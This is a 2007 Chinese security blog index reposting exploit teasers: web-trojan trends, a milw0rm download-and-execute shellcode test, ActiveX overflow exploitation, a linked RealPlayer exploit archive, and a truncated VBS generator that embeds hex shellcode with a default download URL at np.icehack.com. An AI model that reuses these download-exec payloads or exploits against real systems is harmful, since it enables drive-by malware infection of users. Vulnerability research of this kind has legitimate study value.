鬼仔's Blog

来源：网络巡警的博客

2007年度，网页木马层数不穷（其实从来也没少过），与以往稍微不同的是，在“黑客”玩烂经典网马漏洞了MS0-014和MS07-017之后，在使用了各种加密，跳转，框架包含之后，随着用户安全意识的提高（稍微高了那么一点点，知道打补丁了），系统漏洞的已经被最大限度地使用了，今年随着WEB讯雷惊暴漏洞之后，雅虎通漏洞，百度搜霸漏洞，PPStream ，暴风影音II，QQ场景，新浪UC ，MSN Messenger 视频漏洞，联众世界游戏大厅，各主流应用软件仿佛赶集似的出现0-Day漏洞，而且都以迅雷不及掩耳盗铃之势被病毒作者利用，往日为我们工资、学习和娱乐带来便捷和快乐的软件，仿佛一夜之间变得青面獠牙，成为病毒传播的快速通道！
阅读全文 »

作者：疯狗

终于在milw0rm找到了一个不错的shellcode，down&exec的，灰常好用！顺手写了一个C测试了下，结果是成功下载并执行了"木马"，muma.exe是我用delphi写的一个简单的执行测试程序，无毒无害。
阅读全文 »

By：疯狗【B.C.T】

忽然发现我仅仅是发掘ActiveX漏洞，但不去利用，利用远远要比发掘有趣：）
COMRaider自带了一个vuln.dll的漏洞链接库文件，我就拿这个下手吧（外面的AX漏洞要么已经被开发出exp，要么已经被找的差不多了...）
一共5个函数，我就用Method1参数进行攻击，字符型的

溢出点的定位我还是用CCProxy Telnet Proxy Ping远程栈溢出分析中的方法，首先生成1000个字符，然后提交到函数中，意料之中的崩溃，看看错误

阅读全文 »

来源：酒水不犯茶水

好像10.5以下版本都中，这个似乎只能溢出一次，第一次溢出成功后，第二次开始会有realplay修复数据库的提示，点修复就中，取消不中

上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题，但是"iecv.exe"那个87K
溢出的时候老是看不到界面，其实已经执行（进程中可以看到），不知道为什么(不知道是否大小问题)

另：IE5不中，代码中直接跳过了

http://www.blogjava.net/Files/baicker/realplay_071122_exp.rar

鬼仔注：又见联众

来源：vbs空间

exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

来源：Bug Center Team
作者：Maple-x

影响版本:
pplive 1.8beat2

有问题的dll:
MngModule.dll 1.7.0.2

未影响版本：
还没吧。:-)

分析：
以下是在luoluo的协助下分析的，基本属于luoluo语录。:)
给出分析过程，给和我一样刚接触溢出一点漏洞分析的思路。

阅读全文 »